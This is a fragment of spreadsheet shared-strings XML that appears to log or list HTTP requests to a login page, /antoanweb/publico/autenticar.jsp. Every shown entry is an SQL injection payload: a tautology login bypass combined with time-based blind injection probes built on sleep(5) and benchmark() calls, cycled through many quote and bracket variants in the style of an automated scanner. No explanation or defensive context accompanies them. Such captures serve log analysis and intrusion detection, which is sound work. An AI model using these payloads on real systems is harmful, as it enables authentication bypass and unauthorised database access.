    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectsleep(5);--and(((3623=3623</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectsleep(5);--and('dobi'='dobi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectsleep(5);--and(('afsu'='afsu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectsleep(5);--and((('bzhf'='bzhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectsleep(5);--and'ivhv'='ivhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectsleep(5);--and('xfeu'like'xfeu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectsleep(5);--and(('womc'like'womc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectsleep(5);--and((('xkuc'like'xkuc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectsleep(5);--and'pika'like'pika</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectsleep(5);--and("svoa"="svoa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectsleep(5);--and(("zidm"="zidm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectsleep(5);--and((("dxij"="dxij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectsleep(5);--and"xoew"="xoew</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectsleep(5);--and("bmmb"like"bmmb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectsleep(5);--and(("cqgz"like"cqgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectsleep(5);--and((("erzr"like"erzr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectsleep(5);--and"gobe"like"gobe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectbenchmark(5000000,md5(char(103,89,106,80)));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectbenchmark(5000000,md5(char(103,89,106,80)));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectbenchmark(5000000,md5(char(103,89,106,80)));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectbenchmark(5000000,md5(char(103,89,106,80)));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectbenchmark(5000000,md5(char(103,89,106,80)));--and(4972=4972</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectbenchmark(5000000,md5(char(103,89,106,80)));--and((7041=7041</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectbenchmark(5000000,md5(char(103,89,106,80)));--and(((5867=5867</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectbenchmark(5000000,md5(char(103,89,106,80)));--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectbenchmark(5000000,md5(char(103,89,106,80)));--and('quqz'='quqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectbenchmark(5000000,md5(char(103,89,106,80)));--and(('wcio'='wcio</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectbenchmark(5000000,md5(char(103,89,106,80)));--and((('ugyy'='ugyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectbenchmark(5000000,md5(char(103,89,106,80)));--and'klis'='klis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectbenchmark(5000000,md5(char(103,89,106,80)));--and('egdi'like'egdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectbenchmark(5000000,md5(char(103,89,106,80)));--and(('yglk'like'yglk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectbenchmark(5000000,md5(char(103,89,106,80)));--and((('ermh'like'ermh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectbenchmark(5000000,md5(char(103,89,106,80)));--and'cykp'like'cykp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectbenchmark(5000000,md5(char(103,89,106,80)));--and("idmg"="idmg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectbenchmark(5000000,md5(char(103,89,106,80)));--and(("ctkn"="ctkn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectbenchmark(5000000,md5(char(103,89,106,80)));--and((("aore"="aore</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectbenchmark(5000000,md5(char(103,89,106,80)));--and"hzev"="hzev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectbenchmark(5000000,md5(char(103,89,106,80)));--and("amqs"like"amqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectbenchmark(5000000,md5(char(103,89,106,80)));--and(("dmbh"like"dmbh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectbenchmark(5000000,md5(char(103,89,106,80)));--and((("dbtw"like"dbtw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectbenchmark(5000000,md5(char(103,89,106,80)));--and"emji"like"emji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)andsleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)andsleep(5)and(7317=7317</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))andsleep(5)and((4873=4873</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))andsleep(5)and(((770=770</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarandsleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)and('kbap'='kbap</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))andsleep(5)and(('yypj'='yypj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))andsleep(5)and((('rvug'='rvug</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)and'tzhm'='tzhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)and('dqqv'like'dqqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))andsleep(5)and(('rcrr'like'rcrr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))andsleep(5)and((('gpqg'like'gpqg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)and'bhlu'like'bhlu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")andsleep(5)and("unpi"="unpi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))andsleep(5)and(("xgvj"="xgvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))andsleep(5)and((("bxdj"="bxdj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)and"rpro"="rpro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")andsleep(5)and("oefl"like"oefl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))andsleep(5)and(("xepu"like"xepu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))andsleep(5)and((("clno"like"clno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)and"ujro"like"ujro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)andsleep(5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)andsleep(5)--and(5293=5293</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))andsleep(5)--and((884=884</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))andsleep(5)--and(((1522=1522</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarandsleep(5)--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)--and('gnll'='gnll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))andsleep(5)--and(('gcgx'='gcgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))andsleep(5)--and((('crqa'='crqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)--and'ptzv'='ptzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')andsleep(5)--and('fhnh'like'fhnh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))andsleep(5)--and(('poay'like'poay</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))andsleep(5)--and((('efiy'like'efiy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'andsleep(5)--and'wthp'like'wthp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")andsleep(5)--and("zsgw"="zsgw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))andsleep(5)--and(("aumc"="aumc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))andsleep(5)--and((("kilu"="kilu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)--and"vjip"="vjip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")andsleep(5)--and("jcqd"like"jcqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))andsleep(5)--and(("lwat"like"lwat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))andsleep(5)--and((("btdx"like"btdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"andsleep(5)--and"dtma"like"dtma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and787=benchmark(5000000,md5(char(113,67,108,90)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and787=benchmark(5000000,md5(char(113,67,108,90)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and787=benchmark(5000000,md5(char(113,67,108,90)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and787=benchmark(5000000,md5(char(113,67,108,90)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and787=benchmark(5000000,md5(char(113,67,108,90)))and(8836=8836</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and787=benchmark(5000000,md5(char(113,67,108,90)))and((8016=8016</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and787=benchmark(5000000,md5(char(113,67,108,90)))and(((6070=6070</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand787=benchmark(5000000,md5(char(113,67,108,90)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and787=benchmark(5000000,md5(char(113,67,108,90)))and('vrnb'='vrnb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and787=benchmark(5000000,md5(char(113,67,108,90)))and(('kyfu'='kyfu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and787=benchmark(5000000,md5(char(113,67,108,90)))and((('khrm'='khrm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and787=benchmark(5000000,md5(char(113,67,108,90)))and'ftlh'='ftlh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and787=benchmark(5000000,md5(char(113,67,108,90)))and('hylw'like'hylw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and787=benchmark(5000000,md5(char(113,67,108,90)))and(('qlnq'like'qlnq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and787=benchmark(5000000,md5(char(113,67,108,90)))and((('jxqv'like'jxqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and787=benchmark(5000000,md5(char(113,67,108,90)))and'vdgf'like'vdgf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and787=benchmark(5000000,md5(char(113,67,108,90)))and("juou"="juou</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and787=benchmark(5000000,md5(char(113,67,108,90)))and(("yjvy"="yjvy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and787=benchmark(5000000,md5(char(113,67,108,90)))and((("baem"="baem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and787=benchmark(5000000,md5(char(113,67,108,90)))and"yhlj"="yhlj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and787=benchmark(5000000,md5(char(113,67,108,90)))and("nxol"like"nxol</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and787=benchmark(5000000,md5(char(113,67,108,90)))and(("ukcy"like"ukcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and787=benchmark(5000000,md5(char(113,67,108,90)))and((("hfre"like"hfre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and787=benchmark(5000000,md5(char(113,67,108,90)))and"xjld"like"xjld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3543=benchmark(5000000,md5(char(104,81,106,79)))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3543=benchmark(5000000,md5(char(104,81,106,79)))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3543=benchmark(5000000,md5(char(104,81,106,79)))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3543=benchmark(5000000,md5(char(104,81,106,79)))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(2206=2206</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and((7996=7996</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(((2798=2798</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand3543=benchmark(5000000,md5(char(104,81,106,79)))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3543=benchmark(5000000,md5(char(104,81,106,79)))--and('mkdq'='mkdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(('nzud'='nzud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and((('geha'='geha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3543=benchmark(5000000,md5(char(104,81,106,79)))--and'madw'='madw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3543=benchmark(5000000,md5(char(104,81,106,79)))--and('qrsq'like'qrsq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(('wewo'like'wewo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and((('yztb'like'yztb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3543=benchmark(5000000,md5(char(104,81,106,79)))--and'fmni'like'fmni</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3543=benchmark(5000000,md5(char(104,81,106,79)))--and("pvbd"="pvbd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(("utxj"="utxj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and((("hpje"="hpje</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3543=benchmark(5000000,md5(char(104,81,106,79)))--and"kauv"="kauv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3543=benchmark(5000000,md5(char(104,81,106,79)))--and("rlfb"like"rlfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and(("zwnp"like"zwnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3543=benchmark(5000000,md5(char(104,81,106,79)))--and((("lkiu"like"lkiu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3543=benchmark(5000000,md5(char(104,81,106,79)))--and"vquz"like"vquz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3365</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3342)or4352=sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5255</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4173')or4352=sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1972</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1709'or4352=sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7760</t>
  </si>
  <si>
